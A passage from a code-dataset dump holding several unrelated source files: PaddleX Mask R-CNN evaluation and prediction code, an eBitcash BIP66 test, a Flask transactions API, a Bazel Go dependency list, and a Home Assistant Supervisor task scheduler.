'VOC']。默认为None,\n 根据用户传入的Dataset自动选择,如为VOCDetection,则metric为'VOC';\n 如为COCODetection,则metric为'COCO'。\n return_details (bool): 是否返回详细信息。默认值为False。\n\n Returns:\n tuple (metrics, eval_details) /dict (metrics): 当return_details为True时,返回(metrics, eval_details),\n 当return_details为False时,返回metrics。metrics为dict,包含关键字:'bbox_mmap'和'segm_mmap'\n 或者’bbox_map‘和'segm_map',分别表示预测框和分割区域平均准确率平均值在\n 各个IoU阈值下的结果取平均值的结果(mmAP)、平均准确率平均值(mAP)。eval_details为dict,\n 包含bbox、mask和gt三个关键字。其中关键字bbox的键值是一个列表,列表中每个元素代表一个预测结果,\n 一个预测结果是一个由图像id,预测框类别id, 预测框坐标,预测框得分组成的列表。\n 关键字mask的键值是一个列表,列表中每个元素代表各预测框内物体的分割结果,分割结果由图像id、\n 预测框类别id、表示预测框内各像素点是否属于物体的二值图、预测框得分。\n 而关键字gt的键值是真实标注框的相关信息。\n \"\"\"\n input_channel = getattr(self, 'input_channel', 3)\n arrange_transforms(\n model_type=self.model_type,\n class_name=self.__class__.__name__,\n transforms=eval_dataset.transforms,\n mode='eval',\n input_channel=input_channel)\n if metric is None:\n if hasattr(self, 'metric') and self.metric is not None:\n metric = self.metric\n else:\n if isinstance(eval_dataset, paddlex.datasets.CocoDetection):\n metric = 'COCO'\n else:\n raise Exception(\n \"eval_dataset should be datasets.COCODetection.\")\n assert metric in ['COCO', 'VOC'], \"Metric only support 'VOC' or 'COCO'\"\n if batch_size > 1:\n batch_size = 1\n logging.warning(\n \"Mask RCNN supports batch_size=1 only during evaluating, so batch_size is forced to be set to 1.\"\n )\n data_generator = eval_dataset.generator(\n batch_size=batch_size, drop_last=False)\n\n total_steps = math.ceil(eval_dataset.num_samples * 1.0 / batch_size)\n results = list()\n logging.info(\n \"Start to evaluating(total_samples={}, total_steps={})...\".format(\n eval_dataset.num_samples, total_steps))\n for step, data in tqdm.tqdm(\n enumerate(data_generator()), total=total_steps):\n images = np.array([d[0] for d in data]).astype('float32')\n im_infos = np.array([d[1] for d in data]).astype('float32')\n im_shapes = np.array([d[3] for d in data]).astype('float32')\n feed_data = {\n 'image': images,\n 'im_info': im_infos,\n 'im_shape': im_shapes,\n }\n with fluid.scope_guard(self.scope):\n outputs = self.exe.run(\n self.test_prog,\n feed=[feed_data],\n fetch_list=list(self.test_outputs.values()),\n return_numpy=False)\n res = {\n 'bbox': (np.array(outputs[0]),\n outputs[0].recursive_sequence_lengths()),\n 'mask': (np.array(outputs[1]),\n outputs[1].recursive_sequence_lengths())\n }\n res_im_id = [d[2] for d in data]\n res['im_info'] = (im_infos, [])\n res['im_shape'] = (im_shapes, [])\n res['im_id'] = (np.array(res_im_id), [])\n results.append(res)\n logging.debug(\"[EVAL] Epoch={}, Step={}/{}\".format(epoch_id, step +\n 1, total_steps))\n\n ap_stats, eval_details = eval_results(\n results,\n 'COCO',\n eval_dataset.coco_gt,\n with_background=True,\n resolution=self.mask_head_resolution)\n if metric == 'VOC':\n if isinstance(ap_stats[0], np.ndarray) and isinstance(ap_stats[1],\n np.ndarray):\n metrics = OrderedDict(\n zip(['bbox_map', 'segm_map'],\n [ap_stats[0][1], ap_stats[1][1]]))\n else:\n metrics = OrderedDict(\n zip(['bbox_map', 'segm_map'], [0.0, 0.0]))\n elif metric == 'COCO':\n if isinstance(ap_stats[0], np.ndarray) and isinstance(ap_stats[1],\n np.ndarray):\n metrics = OrderedDict(\n zip(['bbox_mmap', 'segm_mmap'],\n [ap_stats[0][0], ap_stats[1][0]]))\n else:\n metrics = OrderedDict(\n zip(['bbox_mmap', 'segm_mmap'], [0.0, 0.0]))\n if return_details:\n return metrics, eval_details\n return metrics\n\n @staticmethod\n def _postprocess(res, batch_size, num_classes, mask_head_resolution,\n labels):\n clsid2catid = dict({i: i for i in range(num_classes)})\n xywh_results = bbox2out([res], clsid2catid)\n segm_results = mask2out([res], clsid2catid, mask_head_resolution)\n preds = [[] for i in range(batch_size)]\n import pycocotools.mask as mask_util\n for index, xywh_res in enumerate(xywh_results):\n image_id = xywh_res['image_id']\n del xywh_res['image_id']\n xywh_res['mask'] = mask_util.decode(segm_results[index][\n 'segmentation'])\n xywh_res['category'] = labels[xywh_res['category_id']]\n preds[image_id].append(xywh_res)\n\n return preds\n\n def predict(self, img_file, transforms=None):\n \"\"\"预测。\n\n Args:\n img_file(str|np.ndarray): 预测图像路径,或者是解码后的排列格式为(H, W, C)且类型为float32且为BGR格式的数组。\n transforms (paddlex.det.transforms): 数据预处理操作。\n\n Returns:\n lict: 预测结果列表,每个预测结果由预测框类别标签、预测框类别名称、\n 预测框坐标(坐标格式为[xmin, ymin, w, h])、\n 原图大小的预测二值图(1表示预测框类别,0表示背景类)、\n 预测框得分组成。\n \"\"\"\n if transforms is None and not hasattr(self, 'test_transforms'):\n raise Exception(\"transforms need to be defined, now is None.\")\n if isinstance(img_file, (str, np.ndarray)):\n images = [img_file]\n else:\n raise Exception(\"img_file must be str/np.ndarray\")\n\n if transforms is None:\n transforms = self.test_transforms\n input_channel = getattr(self, 'input_channel', 3)\n im, im_resize_info, im_shape = FasterRCNN._preprocess(\n images,\n transforms,\n self.model_type,\n self.__class__.__name__,\n input_channel=input_channel)\n\n with fluid.scope_guard(self.scope):\n result = self.exe.run(self.test_prog,\n feed={\n 'image': im,\n 'im_info': im_resize_info,\n 'im_shape': im_shape\n },\n fetch_list=list(self.test_outputs.values()),\n return_numpy=False,\n use_program_cache=True)\n\n res = {\n k: (np.array(v), v.recursive_sequence_lengths())\n for k, v in zip(list(self.test_outputs.keys()), result)\n }\n res['im_id'] = (np.array(\n [[i] for i in range(len(images))]).astype('int32'), [])\n res['im_shape'] = (np.array(im_shape), [])\n preds = MaskRCNN._postprocess(res,\n len(images), self.num_classes,\n self.mask_head_resolution, self.labels)\n\n return preds[0]\n\n def batch_predict(self, img_file_list, transforms=None):\n \"\"\"预测。\n\n Args:\n img_file_list(list|tuple): 对列表(或元组)中的图像同时进行预测,列表中的元素可以是图像路径\n 也可以是解码后的排列格式为(H,W,C)且类型为float32且为BGR格式的数组。\n transforms (paddlex.det.transforms): 数据预处理操作。\n Returns:\n dict: 每个元素都为列表,表示各图像的预测结果。在各图像的预测结果列表中,每个预测结果由预测框类别标签、预测框类别名称、\n 预测框坐标(坐标格式为[xmin, ymin, w, h])、\n 原图大小的预测二值图(1表示预测框类别,0表示背景类)、\n 预测框得分组成。\n \"\"\"\n if transforms is None and not hasattr(self, 'test_transforms'):\n raise Exception(\"transforms need to be defined, now is None.\")\n\n if not isinstance(img_file_list, (list, tuple)):\n raise Exception(\"im_file must be list/tuple\")\n\n if transforms is None:\n transforms = self.test_transforms\n input_channel = getattr(self, 'input_channel', 3)\n im, im_resize_info, im_shape = FasterRCNN._preprocess(\n img_file_list,\n transforms,\n self.model_type,\n self.__class__.__name__,\n self.thread_pool,\n input_channel=input_channel)\n\n with fluid.scope_guard(self.scope):\n result = self.exe.run(self.test_prog,\n feed={\n 'image': im,\n 'im_info': im_resize_info,\n 'im_shape': im_shape\n },\n fetch_list=list(self.test_outputs.values()),\n return_numpy=False,\n use_program_cache=True)\n\n res = {\n k: (np.array(v), v.recursive_sequence_lengths())\n for k, v in zip(list(self.test_outputs.keys()), result)\n }\n res['im_id'] = (np.array(\n [[i] for i in range(len(img_file_list))]).astype('int32'), [])\n res['im_shape'] = (np.array(im_shape), [])\n preds = MaskRCNN._postprocess(res,\n len(img_file_list), self.num_classes,\n self.mask_head_resolution, self.labels)\n return preds\n"} {"ext": "py", "sha": "1a2eacc2f3916b6075bdbfc43d13fe6c53275fcf", "content": "#!/usr/bin/env python3\n# Copyright (c) 2014-2016 The Bitcoin Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Test the BIP66 changeover logic.\"\"\"\n\nfrom test_framework.test_framework import eBitcashTestFramework\nfrom test_framework.util import *\n\nclass BIP66Test(eBitcashTestFramework):\n def __init__(self):\n super().__init__()\n self.num_nodes = 3\n self.setup_clean_chain = False\n self.extra_args = [[], [\"-blockversion=2\"], [\"-blockversion=3\"]]\n\n def setup_network(self):\n self.setup_nodes()\n connect_nodes(self.nodes[1], 0)\n connect_nodes(self.nodes[2], 0)\n self.sync_all()\n\n def run_test(self):\n cnt = self.nodes[0].getblockcount()\n\n # Mine some old-version blocks\n self.nodes[1].generate(100)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 100):\n raise AssertionError(\"Failed to mine 100 version=2 blocks\")\n\n # Mine 750 new-version blocks\n for i in range(15):\n self.nodes[2].generate(50)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 850):\n raise AssertionError(\"Failed to mine 750 version=3 blocks\")\n\n # TODO: check that new DERSIG rules are not enforced\n\n # Mine 1 new-version block\n self.nodes[2].generate(1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 851):\n raise AssertionError(\"Failed to mine a version=3 blocks\")\n\n # TODO: check that new DERSIG rules are enforced\n\n # Mine 198 new-version blocks\n for i in range(2):\n self.nodes[2].generate(99)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1049):\n raise AssertionError(\"Failed to mine 198 version=3 blocks\")\n\n # Mine 1 old-version block\n self.nodes[1].generate(1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1050):\n raise AssertionError(\"Failed to mine a version=2 block after 949 version=3 blocks\")\n\n # Mine 1 new-version blocks\n self.nodes[2].generate(1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1051):\n raise AssertionError(\"Failed to mine a version=3 block\")\n\n # Mine 1 old-version blocks. This should fail\n assert_raises_jsonrpc(-1, \"CreateNewBlock: TestBlockValidity failed: bad-version(0x00000002)\", self.nodes[1].generate, 1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1051):\n raise AssertionError(\"Accepted a version=2 block after 950 version=3 blocks\")\n\n # Mine 1 new-version blocks\n self.nodes[2].generate(1)\n self.sync_all()\n if (self.nodes[0].getblockcount() != cnt + 1052):\n raise AssertionError(\"Failed to mine a version=3 block\")\n\nif __name__ == '__main__':\n BIP66Test().main()\n"} {"ext": "py", "sha": "1a2eace8ec481648fbd359e34435c38d92ba172b", "content": "import sqlite3\nimport json\nimport math\nfrom sqlite3.dbapi2 import Error\n\nfrom flask import Flask, request, Response, render_template\n\napp = Flask(__name__)\n\n\ndef open_db():\n db = sqlite3.connect('./transactions.db')\n db.row_factory = sqlite3.Row\n return db\n\n\n@app.route('/', methods=['GET'])\ndef transactions():\n return render_template('transactions.html')\n\n\n@app.route('/categories', methods=['GET'])\ndef categories():\n return render_template('categories.html')\n\n\n@app.route('/api/transactions', methods=['GET'])\ndef get_transactions():\n with open_db() as db:\n results = db.execute('SELECT * FROM transactions WHERE date >= \"2021-05-01\" ORDER BY date ASC')\n return Response(json.dumps([dict(idx) for idx in results.fetchall()]), mimetype='application/json')\n\n\n@app.route('/api/transactions/', methods=['PUT', 'PATCH'])\ndef update_transaction(id):\n transaction = request.get_json(force=True)\n with open_db() as db:\n db.execute('UPDATE transactions SET category_id = ? WHERE id = ?', (transaction['category_id'], id))\n db.commit()\n return {'success': True}\n\n\n@app.route('/api/categories', methods=['GET'])\ndef get_categories():\n with open_db() as db:\n results = db.execute('SELECT * FROM categories')\n return Response(json.dumps([dict(idx) for idx in results.fetchall()]), mimetype='application/json')\n\n\n@app.route('/api/categories', methods=['POST'])\ndef create_category():\n category = request.get_json(force=True)\n with open_db() as db:\n db.execute('INSERT INTO categories (name) VALUES (?)', (category.get('name'),))\n db.commit()\n return {'success': True}\n\n\n@app.route('/api/breakdown', methods=['GET'])\ndef get_breakdown():\n group_by_first = request.args.get('group_by', 'month').lower()\n\n with open_db() as db:\n results = db.execute('''\n SELECT\n j.*\n FROM (\n SELECT\n t.id,\n t.date,\n SUBSTR(t.date, 0, 8) as month,\n t.amount,\n REPLACE(t.description, ' ', ' ') as description,\n t.category_id,\n c.name as category_name,\n t.source\n FROM transactions t\n INNER JOIN categories c on t.category_id = c.id\n WHERE c.name NOT IN ('Income', 'Payments', 'Savings') AND t.date >= '2021-05'\n ) j\n ORDER BY j.month ASC, j.category_name ASC\n ''')\n # return Response(json.dumps([dict(idx) for idx in results.fetchall()], indent=2), mimetype='application/json')\n transactions = [dict(idx) for idx in results.fetchall()]\n\n if group_by_first == 'month':\n first_group = 'month'\n second_group = 'category_name'\n elif group_by_first == 'category':\n first_group = 'category_name'\n second_group = 'month'\n else:\n return Response(Error('Invalid group by'))\n\n aggregated_transactions = {}\n\n for item in transactions:\n item['description'] = item['description'].replace(' ', ' ', 10).replace('\\t', ' ')\n\n top_group_value = item.get(first_group)\n second_group_value = item.get(second_group)\n if top_group_value in aggregated_transactions.keys():\n if second_group_value in aggregated_transactions[top_group_value].keys():\n sub_group = aggregated_transactions[top_group_value][second_group_value]\n sub_group['transactions'].append(item)\n sub_group['summary']['amount'] += item['amount']\n sub_group['summary']['total_transactions'] += 1\n sub_group['summary']['min'] = min(sub_group['summary']['min'], item['amount'])\n sub_group['summary']['max'] = max(sub_group['summary']['max'], item['amount'])\n sub_group['summary']['avg'] = round(sub_group['summary']['amount'] / sub_group['summary']['total_transactions'], 2)\n else:\n aggregated_transactions[top_group_value][second_group_value] = {\n 'summary': {\n 'amount': item['amount'],\n 'total_transactions': 1,\n 'min': item['amount'],\n 'max': item['amount'],\n 'avg': item['amount']\n },\n 'transactions': [item]\n }\n else:\n aggregated_transactions[top_group_value] = {}\n aggregated_transactions[top_group_value][second_group_value] = {\n 'summary': {\n 'amount': item['amount'],\n 'total_transactions': 1,\n 'min': item['amount'],\n 'max': item['amount'],\n 'avg': item['amount']\n },\n 'transactions': [item]\n }\n\n \n return Response(json.dumps(aggregated_transactions, indent=2), mimetype='application/json')\n"} {"ext": "bzl", "sha": "1a2eae09591d2dbe03c23e4a65058c61e49d5754", "content": "load(\"@bazel_gazelle//:deps.bzl\", \"go_repository\")\n\ndef go_repositories():\n go_repository(\n name = \"co_honnef_go_tools\",\n importpath = \"honnef.co/go/tools\",\n sum = \"h1:/hemPrYIhOhy8zYrNj+069zDB68us2sMGsfkFJO0iZs=\",\n version = \"v0.0.0-20190523083050-ea95bdfd59fc\",\n )\n go_repository(\n name = \"com_github_burntsushi_toml\",\n importpath = \"github.com/BurntSushi/toml\",\n sum = \"h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=\",\n version = \"v0.3.1\",\n )\n go_repository(\n name = \"com_github_census_instrumentation_opencensus_proto\",\n importpath = \"github.com/census-instrumentation/opencensus-proto\",\n sum = \"h1:glEXhBS5PSLLv4IXzLA5yPRVX4bilULVyxxbrfOtDAk=\",\n version = \"v0.2.1\",\n )\n go_repository(\n name = \"com_github_client9_misspell\",\n importpath = \"github.com/client9/misspell\",\n sum = \"h1:ta993UF76GwbvJcIo3Y68y/M3WxlpEHPWIGDkJYwzJI=\",\n version = \"v0.3.4\",\n )\n go_repository(\n name = \"com_github_cncf_udpa_go\",\n importpath = \"github.com/cncf/udpa/go\",\n sum = \"h1:WBZRG4aNOuI15bLRrCgN8fCq8E5Xuty6jGbmSNEvSsU=\",\n version = \"v0.0.0-20191209042840-269d4d468f6f\",\n )\n go_repository(\n name = \"com_github_davecgh_go_spew\",\n importpath = \"github.com/davecgh/go-spew\",\n sum = \"h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8=\",\n version = \"v1.1.0\",\n )\n go_repository(\n name = \"com_github_envoyproxy_go_control_plane\",\n importpath = \"github.com/envoyproxy/go-control-plane\",\n sum = \"h1:rEvIZUSZ3fx39WIi3JkQqQBitGwpELBIYWeBVh6wn+E=\",\n version = \"v0.9.4\",\n )\n go_repository(\n name = \"com_github_envoyproxy_protoc_gen_validate\",\n importpath = \"github.com/envoyproxy/protoc-gen-validate\",\n sum = \"h1:EQciDnbrYxy13PgWoY8AqoxGiPrpgBZ1R8UNe3ddc+A=\",\n version = \"v0.1.0\",\n )\n go_repository(\n name = \"com_github_golang_glog\",\n importpath = \"github.com/golang/glog\",\n sum = \"h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58=\",\n version = \"v0.0.0-20160126235308-23def4e6c14b\",\n )\n go_repository(\n name = \"com_github_golang_mock\",\n importpath = \"github.com/golang/mock\",\n sum = \"h1:G5FRp8JnTd7RQH5kemVNlMeyXQAztQ3mOWV95KxsXH8=\",\n version = \"v1.1.1\",\n )\n go_repository(\n name = \"com_github_golang_protobuf\",\n importpath = \"github.com/golang/protobuf\",\n sum = \"h1:F768QJ1E9tib+q5Sc8MkdJi1RxLTbRcTf8LJV56aRls=\",\n version = \"v1.3.5\",\n )\n go_repository(\n name = \"com_github_google_go_cmp\",\n importpath = \"github.com/google/go-cmp\",\n sum = \"h1:+dTQ8DZQJz0Mb/HjFlkptS1FeQ4cWSnN941F8aEG4SQ=\",\n version = \"v0.2.0\",\n )\n go_repository(\n name = \"com_github_labstack_echo\",\n importpath = \"github.com/labstack/echo\",\n sum = \"h1:pGRcYk231ExFAyoAjAfD85kQzRJCRI8bbnE7CX5OEgg=\",\n version = \"v3.3.10+incompatible\",\n )\n go_repository(\n name = \"com_github_labstack_gommon\",\n importpath = \"github.com/labstack/gommon\",\n sum = \"h1:JEeO0bvc78PKdyHxloTKiF8BD5iGrH8T6MSeGvSgob0=\",\n version = \"v0.3.0\",\n )\n go_repository(\n name = \"com_github_mattn_go_colorable\",\n importpath = \"github.com/mattn/go-colorable\",\n sum = \"h1:/bC9yWikZXAL9uJdulbSfyVNIR3n3trXl+v8+1sx8mU=\",\n version = \"v0.1.2\",\n )\n go_repository(\n name = \"com_github_mattn_go_isatty\",\n importpath = \"github.com/mattn/go-isatty\",\n sum = \"h1:d5US/mDsogSGW37IV293h//ZFaeajb69h+EHFsv2xGg=\",\n version = \"v0.0.9\",\n )\n go_repository(\n name = \"com_github_pmezard_go_difflib\",\n importpath = \"github.com/pmezard/go-difflib\",\n sum = \"h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=\",\n version = \"v1.0.0\",\n )\n go_repository(\n name = \"com_github_prometheus_client_model\",\n importpath = \"github.com/prometheus/client_model\",\n sum = \"h1:gQz4mCbXsO+nc9n1hCxHcGA3Zx3Eo+UHZoInFGUIXNM=\",\n version = \"v0.0.0-20190812154241-14fe0d1b01d4\",\n )\n go_repository(\n name = \"com_github_stretchr_objx\",\n importpath = \"github.com/stretchr/objx\",\n sum = \"h1:4G4v2dO3VZwixGIRoQ5Lfboy6nUhCyYzaqnIAPPhYs4=\",\n version = \"v0.1.0\",\n )\n go_repository(\n name = \"com_github_stretchr_testify\",\n importpath = \"github.com/stretchr/testify\",\n sum = \"h1:nOGnQDM7FYENwehXlg/kFVnos3rEvtKTjRvOWSzb6H4=\",\n version = \"v1.5.1\",\n )\n go_repository(\n name = \"com_github_valyala_bytebufferpool\",\n importpath = \"github.com/valyala/bytebufferpool\",\n sum = \"h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw=\",\n version = \"v1.0.0\",\n )\n go_repository(\n name = \"com_github_valyala_fasttemplate\",\n importpath = \"github.com/valyala/fasttemplate\",\n sum = \"h1:tY9CJiPnMXf1ERmG2EyK7gNUd+c6RKGD0IfU8WdUSz8=\",\n version = \"v1.0.1\",\n )\n go_repository(\n name = \"com_google_cloud_go\",\n importpath = \"cloud.google.com/go\",\n sum = \"h1:e0WKqKTd5BnrG8aKH3J3h+QvEIQtSUcf2n5UZ5ZgLtQ=\",\n version = \"v0.26.0\",\n )\n go_repository(\n name = \"in_gopkg_check_v1\",\n importpath = \"gopkg.in/check.v1\",\n sum = \"h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=\",\n version = \"v0.0.0-20161208181325-20d25e280405\",\n )\n go_repository(\n name = \"in_gopkg_yaml_v2\",\n importpath = \"gopkg.in/yaml.v2\",\n sum = \"h1:ZCJp+EgiOT7lHqUV2J862kp8Qj64Jo6az82+3Td9dZw=\",\n version = \"v2.2.2\",\n )\n go_repository(\n name = \"org_golang_google_appengine\",\n importpath = \"google.golang.org/appengine\",\n sum = \"h1:/wp5JvzpHIxhs/dumFmF7BXTf3Z+dd4uXta4kVyO508=\",\n version = \"v1.4.0\",\n )\n go_repository(\n name = \"org_golang_google_genproto\",\n importpath = \"google.golang.org/genproto\",\n sum = \"h1:gSJIx1SDwno+2ElGhA4+qG2zF97qiUzTM+rQ0klBOcE=\",\n version = \"v0.0.0-20190819201941-24fa4b261c55\",\n )\n go_repository(\n name = \"org_golang_google_grpc\",\n importpath = \"google.golang.org/grpc\",\n sum = \"h1:bO/TA4OxCOummhSf10siHuG7vJOiwh7SpRpFZDkOgl4=\",\n version = \"v1.28.0\",\n )\n go_repository(\n name = \"org_golang_x_crypto\",\n importpath = \"golang.org/x/crypto\",\n sum = \"h1:VklqNMn3ovrHsnt90PveolxSbWFaJdECFbxSq0Mqo2M=\",\n version = \"v0.0.0-20190308221718-c2843e01d9a2\",\n )\n go_repository(\n name = \"org_golang_x_exp\",\n importpath = \"golang.org/x/exp\",\n sum = \"h1:c2HOrn5iMezYjSlGPncknSEr/8x5LELb/ilJbXi9DEA=\",\n version = \"v0.0.0-20190121172915-509febef88a4\",\n )\n go_repository(\n name = \"org_golang_x_lint\",\n importpath = \"golang.org/x/lint\",\n sum = \"h1:XQyxROzUlZH+WIQwySDgnISgOivlhjIEwaQaJEJrrN0=\",\n version = \"v0.0.0-20190313153728-d0100b6bd8b3\",\n )\n go_repository(\n name = \"org_golang_x_net\",\n importpath = \"golang.org/x/net\",\n sum = \"h1:oWX7TPOiFAMXLq8o0ikBYfCJVlRHBcsciT5bXOrH628=\",\n version = \"v0.0.0-20190311183353-d8887717615a\",\n )\n go_repository(\n name = \"org_golang_x_oauth2\",\n importpath = \"golang.org/x/oauth2\",\n sum = \"h1:vEDujvNQGv4jgYKudGeI/+DAX4Jffq6hpD55MmoEvKs=\",\n version = \"v0.0.0-20180821212333-d2e6202438be\",\n )\n go_repository(\n name = \"org_golang_x_sync\",\n importpath = \"golang.org/x/sync\",\n sum = \"h1:8gQV6CLnAEikrhgkHFbMAEhagSSnXWGV915qUMm9mrU=\",\n version = \"v0.0.0-20190423024810-112230192c58\",\n )\n go_repository(\n name = \"org_golang_x_sys\",\n importpath = \"golang.org/x/sys\",\n sum = \"h1:aYOabOQFp6Vj6W1F80affTUvO9UxmJRx8K0gsfABByQ=\",\n version = \"v0.0.0-20190813064441-fde4db37ae7a\",\n )\n go_repository(\n name = \"org_golang_x_text\",\n importpath = \"golang.org/x/text\",\n sum = \"h1:g61tztE5qeGQ89tm6NTjjM9VPIm088od1l6aSorWRWg=\",\n version = \"v0.3.0\",\n )\n go_repository(\n name = \"org_golang_x_tools\",\n importpath = \"golang.org/x/tools\",\n sum = \"h1:5Beo0mZN8dRzgrMMkDp0jc8YXQKx9DiJ2k1dkvGsn5A=\",\n version = \"v0.0.0-20190524140312-2c0ae7006135\",\n )\n"} {"ext": "py", "sha": "1a2eae233953993f9be256fe74b5570407e68d01", "content": "\"\"\"A collection of tasks.\"\"\"\nimport logging\n\nfrom ..const import AddonState\nfrom ..coresys import CoreSysAttributes\nfrom ..exceptions import (\n AddonsError,\n AudioError,\n CliError,\n CoreDNSError,\n HomeAssistantError,\n MulticastError,\n ObserverError,\n)\nfrom ..host.const import HostFeature\nfrom ..jobs.decorator import Job, JobCondition\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\nHASS_WATCHDOG_API = \"HASS_WATCHDOG_API\"\n\nRUN_UPDATE_SUPERVISOR = 29100\nRUN_UPDATE_ADDONS = 57600\nRUN_UPDATE_CLI = 28100\nRUN_UPDATE_DNS = 30100\nRUN_UPDATE_AUDIO = 30200\nRUN_UPDATE_MULTICAST = 30300\nRUN_UPDATE_OBSERVER = 30400\n\nRUN_RELOAD_ADDONS = 10800\nRUN_RELOAD_BACKUPS = 72000\nRUN_RELOAD_HOST = 7600\nRUN_RELOAD_UPDATER = 7200\nRUN_RELOAD_INGRESS = 930\n\nRUN_WATCHDOG_HOMEASSISTANT_DOCKER = 15\nRUN_WATCHDOG_HOMEASSISTANT_API = 120\n\nRUN_WATCHDOG_DNS_DOCKER = 30\nRUN_WATCHDOG_AUDIO_DOCKER = 60\nRUN_WATCHDOG_CLI_DOCKER = 60\nRUN_WATCHDOG_OBSERVER_DOCKER = 60\nRUN_WATCHDOG_MULTICAST_DOCKER = 60\n\nRUN_WATCHDOG_ADDON_DOCKER = 30\nRUN_WATCHDOG_ADDON_APPLICATON = 120\nRUN_WATCHDOG_OBSERVER_APPLICATION = 180\n\nRUN_REFRESH_ADDON = 15\n\nRUN_CHECK_CONNECTIVITY = 30\n\n\nclass Tasks(CoreSysAttributes):\n \"\"\"Handle Tasks inside Supervisor.\"\"\"\n\n def __init__(self, coresys):\n \"\"\"Initialize Tasks.\"\"\"\n self.coresys = coresys\n self._cache = {}\n\n async def load(self):\n \"\"\"Add Tasks to scheduler.\"\"\"\n # Update\n self.sys_scheduler.register_task(self._update_addons, RUN_UPDATE_ADDONS)\n self.sys_scheduler.register_task(self._update_supervisor, RUN_UPDATE_SUPERVISOR)\n self.sys_scheduler.register_task(self._update_cli, RUN_UPDATE_CLI)\n self.sys_scheduler.register_task(self._update_dns, RUN_UPDATE_DNS)\n self.sys_scheduler.register_task(self._update_audio, RUN_UPDATE_AUDIO)\n self.sys_scheduler.register_task(self._update_multicast, RUN_UPDATE_MULTICAST)\n self.sys_scheduler.register_task(self._update_observer, RUN_UPDATE_OBSERVER)\n\n # Reload\n self.sys_scheduler.register_task(self.sys_store.reload, RUN_RELOAD_ADDONS)\n self.sys_scheduler.register_task(self.sys_updater.reload, RUN_RELOAD_UPDATER)\n self.sys_scheduler.register_task(self.sys_backups.reload, RUN_RELOAD_BACKUPS)\n self.sys_scheduler.register_task(self.sys_host.reload, RUN_RELOAD_HOST)\n self.sys_scheduler.register_task(self.sys_ingress.reload, RUN_RELOAD_INGRESS)\n\n # Watchdog\n self.sys_scheduler.register_task(\n self._watchdog_homeassistant_docker, RUN_WATCHDOG_HOMEASSISTANT_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_homeassistant_api, RUN_WATCHDOG_HOMEASSISTANT_API\n )\n self.sys_scheduler.register_task(\n self._watchdog_dns_docker, RUN_WATCHDOG_DNS_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_audio_docker, RUN_WATCHDOG_AUDIO_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_cli_docker, RUN_WATCHDOG_CLI_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_observer_docker, RUN_WATCHDOG_OBSERVER_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_observer_application, RUN_WATCHDOG_OBSERVER_APPLICATION\n )\n self.sys_scheduler.register_task(\n self._watchdog_multicast_docker, RUN_WATCHDOG_MULTICAST_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_addon_docker, RUN_WATCHDOG_ADDON_DOCKER\n )\n self.sys_scheduler.register_task(\n self._watchdog_addon_application, RUN_WATCHDOG_ADDON_APPLICATON\n )\n\n # Refresh\n self.sys_scheduler.register_task(self._refresh_addon, RUN_REFRESH_ADDON)\n\n # Connectivity\n self.sys_scheduler.register_task(\n self._check_connectivity, RUN_CHECK_CONNECTIVITY\n )\n\n _LOGGER.info(\"All core tasks are scheduled\")\n\n @Job(\n conditions=[\n JobCondition.HEALTHY,\n JobCondition.FREE_SPACE,\n JobCondition.INTERNET_HOST,\n JobCondition.RUNNING,\n ]\n )\n async def _update_addons(self):\n \"\"\"Check if an update is available for an Add-on and update it.\"\"\"\n for addon in self.sys_addons.all:\n if not addon.is_installed or not addon.auto_update:\n continue\n\n # Evaluate available updates\n if not addon.need_update:\n continue\n if not addon.test_update_schema():\n _LOGGER.warning(\n \"Add-on %s will be ignored, schema tests failed\", addon.slug\n )\n continue\n\n # Run Add-on update sequential\n # avoid issue on slow IO\n _LOGGER.info(\"Add-on auto update process %s\", addon.slug)\n try:\n await addon.update(backup=True)\n except AddonsError:\n _LOGGER.error(\"Can't auto update Add-on %s\", addon.slug)\n\n @Job(\n conditions=[\n JobCondition.FREE_SPACE,\n JobCondition.INTERNET_HOST,\n JobCondition.RUNNING,\n ]\n )\n async def _update_supervisor(self):\n \"\"\"Check and run update of Supervisor Supervisor.\"\"\"\n if not self.sys_supervisor.need_update:\n return\n\n _LOGGER.info(\n \"Found new Supervisor version %s, updating\",\n self.sys_supervisor.latest_version,\n )\n await self.sys_supervisor.update()\n\n async def _watchdog_homeassistant_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n if not self.sys_homeassistant.watchdog:\n # Watchdog is not enabled for Home Assistant\n return\n if self.sys_homeassistant.error_state:\n # Home Assistant is in an error state, this is handled by the rollback feature\n return\n if not await self.sys_homeassistant.core.is_failed():\n # The home assistant container is not in a failed state\n return\n if self.sys_homeassistant.core.in_progress:\n # Home Assistant has a task in progress\n return\n if await self.sys_homeassistant.core.is_running():\n # Home Assistant is running\n return\n\n _LOGGER.warning(\"Watchdog found a problem with Home Assistant Docker!\")\n try:\n await self.sys_homeassistant.core.start()\n except HomeAssistantError as err:\n _LOGGER.error(\"Home Assistant watchdog reanimation failed!\")\n self.sys_capture_exception(err)\n else:\n return\n\n _LOGGER.info(\"Rebuilding the Home Assistant Container\")\n await self.sys_homeassistant.core.rebuild()\n\n async def _watchdog_homeassistant_api(self):\n \"\"\"Create 